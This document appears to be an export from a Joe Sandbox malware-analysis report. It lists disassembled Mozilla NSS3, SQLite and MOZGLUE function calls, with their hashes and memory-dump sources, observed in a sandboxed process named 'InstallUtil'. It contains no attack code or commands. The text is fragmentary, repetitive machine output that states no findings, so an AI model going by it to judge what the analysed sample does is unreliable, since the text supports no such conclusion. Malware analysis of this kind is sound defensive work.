                                                                                                                  • API String ID: 2025608128-0
                                                                                                                  • Opcode ID: b24572aa2363bee507bc35ac0d713db8999171a2a8de3a2b7d54db3be72a8d09
                                                                                                                  • Instruction ID: b2faf9ddf3f36ffaba27b74f7300041730f22c8c1406cc031f426291e86d1b40
                                                                                                                  • Opcode Fuzzy Hash: b24572aa2363bee507bc35ac0d713db8999171a2a8de3a2b7d54db3be72a8d09
                                                                                                                  • Instruction Fuzzy Hash: B33161B5A012199BDB00CFA9E985AAE77F4EF49358F540138ED15E7B00E731EA14CBE1
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C752D1A), ref: 6C762E7E
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • PR_Now.NSS3 ref: 6C762EDF
                                                                                                                  • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C762EE9
                                                                                                                  • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C752D1A), ref: 6C762F01
                                                                                                                  • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C752D1A), ref: 6C762F50
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C762F81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 287051776-0
                                                                                                                  APIs
                                                                                                                  • CERT_DecodeAVAValue.NSS3(?,?,6C750A2C), ref: 6C750E0F
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C750A2C), ref: 6C750E73
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C750A2C), ref: 6C750E85
                                                                                                                  • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C750A2C), ref: 6C750E90
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C750EC4
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C750A2C), ref: 6C750ED9
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3618544408-0
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C770725,00000000,00000058), ref: 6C768906
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C76891A
                                                                                                                  • PL_ArenaAllocate.NSS3(?,?), ref: 6C76894A
                                                                                                                  • calloc.MOZGLUE(00000001,6C77072D,00000000,00000000,00000000,?,6C770725,00000000,00000058), ref: 6C768959
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768993
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7689AF
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1716546843-0
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C75AEB3
                                                                                                                  • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C75AECA
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C75AEDD
                                                                                                                  • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C75AF02
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C879500), ref: 6C75AF23
                                                                                                                    • Part of subcall function 6C7AF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C7AF0C8
                                                                                                                    • Part of subcall function 6C7AF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7AF122
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C75AF37
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3714604333-0
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DEE85
                                                                                                                  • realloc.MOZGLUE(F0F7DD0C,?), ref: 6C7DEEAE
                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C7DEEC5
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • htonl.WSOCK32(?), ref: 6C7DEEE3
                                                                                                                  • htonl.WSOCK32(00000000,?), ref: 6C7DEEED
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C7DEF01
                                                                                                                  Similarity
                                                                                                                  • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1351805024-0
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C7A4EB8,?), ref: 6C7A4884
                                                                                                                    • Part of subcall function 6C7A8800: TlsGetValue.KERNEL32(?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8821
                                                                                                                    • Part of subcall function 6C7A8800: TlsGetValue.KERNEL32(?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A883D
                                                                                                                    • Part of subcall function 6C7A8800: EnterCriticalSection.KERNEL32(?,?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8856
                                                                                                                    • Part of subcall function 6C7A8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C7A8887
                                                                                                                    • Part of subcall function 6C7A8800: PR_Unlock.NSS3(?,?,?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8899
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A4EB8,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A484C
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A4EB8,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A486D
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4899
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A48A9
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A48B8
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2226052791-0
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C7B2576
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C7B2585
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6C7B25A1
                                                                                                                  • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6C7B25AF
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B25BB
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B25CA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3520324648-0
                                                                                                                  • Opcode ID: ea03489dfc8800061af02f7bfd1338aa0a3bb53a0667d1027ca5578208292ef0
                                                                                                                  • Instruction ID: 9f46662eb8c06305311ec0ca357b7a1f8111f0d34d9e9fd6ac05bbc9b69ba9fa
                                                                                                                  • Opcode Fuzzy Hash: ea03489dfc8800061af02f7bfd1338aa0a3bb53a0667d1027ca5578208292ef0
                                                                                                                  • Instruction Fuzzy Hash: E801F5F17062017BFF202AB5AE1DE3B355CDF416E9B100170BC29E5682ED71D81086F2
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$Value$CriticalDeleteSection
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 195087141-0
                                                                                                                  • Opcode ID: 7e708b9e264bbbdd7bff1bc29dda7c0c4dd71331f215690c1e7ada028e87ff01
                                                                                                                  • Instruction ID: 4f1745bf02e16fc54f49b572ab595cd334ad0b558c060ae0059380172d017b01
                                                                                                                  • Opcode Fuzzy Hash: 7e708b9e264bbbdd7bff1bc29dda7c0c4dd71331f215690c1e7ada028e87ff01
                                                                                                                  • Instruction Fuzzy Hash: 01114FB4604B118BCB21BFB9D14826EBBF4BF45349F051A3DD8CA87601EB30A454CBD2
                                                                                                                  APIs
                                                                                                                  • PR_NewMonitor.NSS3(00000000,?,6C7EAA9B,?,?,?,?,?,?,?,00000000,?,6C7E80C1), ref: 6C7E6846
                                                                                                                    • Part of subcall function 6C741770: calloc.MOZGLUE(00000001,0000019C,?,6C7415C2,?,?,?,?,?,00000001,00000040), ref: 6C74178D
                                                                                                                  • PR_NewMonitor.NSS3(00000000,?,6C7EAA9B,?,?,?,?,?,?,?,00000000,?,6C7E80C1), ref: 6C7E6855
                                                                                                                    • Part of subcall function 6C7A8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C7555D0,00000000,00000000), ref: 6C7A868B
                                                                                                                    • Part of subcall function 6C7A8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C7A86A0
                                                                                                                    • Part of subcall function 6C7A8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C7A86B2
                                                                                                                    • Part of subcall function 6C7A8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C7A86C8
                                                                                                                    • Part of subcall function 6C7A8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C7A86E2
                                                                                                                    • Part of subcall function 6C7A8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C7A86EC
                                                                                                                    • Part of subcall function 6C7A8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C7A8700
                                                                                                                  • PR_NewMonitor.NSS3(?,6C7EAA9B,?,?,?,?,?,?,?,00000000,?,6C7E80C1), ref: 6C7E687D
                                                                                                                    • Part of subcall function 6C741770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7418DE
                                                                                                                    • Part of subcall function 6C741770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7418F1
                                                                                                                  • PR_NewMonitor.NSS3(?,6C7EAA9B,?,?,?,?,?,?,?,00000000,?,6C7E80C1), ref: 6C7E688C
                                                                                                                    • Part of subcall function 6C741770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7418FC
                                                                                                                    • Part of subcall function 6C741770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C74198A
                                                                                                                  • PR_NewLock.NSS3 ref: 6C7E68A5
                                                                                                                    • Part of subcall function 6C8198D0: calloc.MOZGLUE(00000001,00000084,6C740936,00000001,?,6C74102C), ref: 6C8198E5
                                                                                                                  • PR_NewLock.NSS3 ref: 6C7E68B4
                                                                                                                    • Part of subcall function 6C8198D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C819946
                                                                                                                    • Part of subcall function 6C8198D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6D16B7,00000000), ref: 6C81994E
                                                                                                                    • Part of subcall function 6C8198D0: free.MOZGLUE(00000000), ref: 6C81995E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 200661885-0
                                                                                                                  • Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                  • Instruction ID: 8599286bbc844fb696fbb472c87ccaba252571897e6a6be3eff6bd13d802c608
                                                                                                                  • Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                  • Instruction Fuzzy Hash: 5B0112B1A05F0B46E7516BB64A183E77AE85F05388F10493D85A9C5F40EF71E508CBA2
                                                                                                                  APIs
                                                                                                                  • PR_EnterMonitor.NSS3(00000000,?,?,6C767F5D,00000000,00000000,?,?,?,6C7680DD), ref: 6C75E532
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190AB
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190C9
                                                                                                                    • Part of subcall function 6C819090: EnterCriticalSection.KERNEL32 ref: 6C8190E5
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C819116
                                                                                                                    • Part of subcall function 6C819090: LeaveCriticalSection.KERNEL32 ref: 6C81913F
                                                                                                                  • PR_EnterMonitor.NSS3(6C7680DD), ref: 6C75E549
                                                                                                                    • Part of subcall function 6C819090: LeaveCriticalSection.KERNEL32 ref: 6C8191AA
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C819212
                                                                                                                    • Part of subcall function 6C819090: _PR_MD_WAIT_CV.NSS3 ref: 6C81926B
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C75E56D
                                                                                                                  • PL_HashTableDestroy.NSS3 ref: 6C75E57B
                                                                                                                    • Part of subcall function 6C75E190: PR_EnterMonitor.NSS3(?,?,6C75E175), ref: 6C75E19C
                                                                                                                    • Part of subcall function 6C75E190: PR_EnterMonitor.NSS3(6C75E175), ref: 6C75E1AA
                                                                                                                    • Part of subcall function 6C75E190: PR_ExitMonitor.NSS3 ref: 6C75E208
                                                                                                                    • Part of subcall function 6C75E190: PL_HashTableRemove.NSS3(?), ref: 6C75E219
                                                                                                                    • Part of subcall function 6C75E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C75E231
                                                                                                                    • Part of subcall function 6C75E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C75E249
                                                                                                                    • Part of subcall function 6C75E190: PR_ExitMonitor.NSS3 ref: 6C75E257
                                                                                                                  • PR_ExitMonitor.NSS3(6C7680DD), ref: 6C75E5B5
                                                                                                                  • PR_DestroyMonitor.NSS3 ref: 6C75E5C3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3740585915-0
                                                                                                                  • Opcode ID: 7adcd887e065253c653064df71741d3a5eeacdddc6967ecea3cb55e4eea2125e
                                                                                                                  • Instruction ID: 8d93bc3153da771a23efbd7fc6bb4bffdfff830790eabb3664974864aaff2c7f
                                                                                                                  • Opcode Fuzzy Hash: 7adcd887e065253c653064df71741d3a5eeacdddc6967ecea3cb55e4eea2125e
                                                                                                                  • Instruction Fuzzy Hash: 040140F1E14284CBEE219B78DF056913BB4B70634CF001036E419A1E12FB31A569EBDA
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C73AFDA
                                                                                                                  Strings
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C73AFC4
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C73AFD3
                                                                                                                  • misuse, xrefs: 6C73AFCE
                                                                                                                  • unable to delete/modify collation sequence due to active statements, xrefs: 6C73AF5C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                  • API String ID: 632333372-924978290
                                                                                                                  • Opcode ID: 564376c486138a65093eb69f80031c6d9239a86d59718c88a0261781eebbe717
                                                                                                                  • Instruction ID: abe72e23ad34e86aeea824bcfe0de375242534eb2b20ed1fdbfa7149997f4ec2
                                                                                                                  • Opcode Fuzzy Hash: 564376c486138a65093eb69f80031c6d9239a86d59718c88a0261781eebbe717
                                                                                                                  • Instruction Fuzzy Hash: B9911575B052268FDF04CF59CA55BAAB7F1BF45324F195468E868AB792C334EC01CB60
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DE53A
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DE5BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 632333372-598938438
                                                                                                                  • Opcode ID: 202311e9196610481b75ff52c2e54794d7d17020df67c948237315ca243c805a
                                                                                                                  • Instruction ID: 5557f05fb12cf79b03a67fdee5e469d704a844ab872fbcf007c61a4bb68bd041
                                                                                                                  • Opcode Fuzzy Hash: 202311e9196610481b75ff52c2e54794d7d17020df67c948237315ca243c805a
                                                                                                                  • Instruction Fuzzy Hash: 013155306407149BC321CEADC8809BAF3A1EB46764B550D7DE848A7B41F362F949C3E8
                                                                                                                  APIs
                                                                                                                  • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C7E2AE9,00000000,0000065C), ref: 6C7FA91D
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                    • Part of subcall function 6C79ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                    • Part of subcall function 6C79ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                    • Part of subcall function 6C79ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C7E2AE9,00000000,0000065C), ref: 6C7FA934
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C7E2AE9,00000000,0000065C), ref: 6C7FA949
                                                                                                                  • free.MOZGLUE(?,00000000,0000065C), ref: 6C7FA952
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
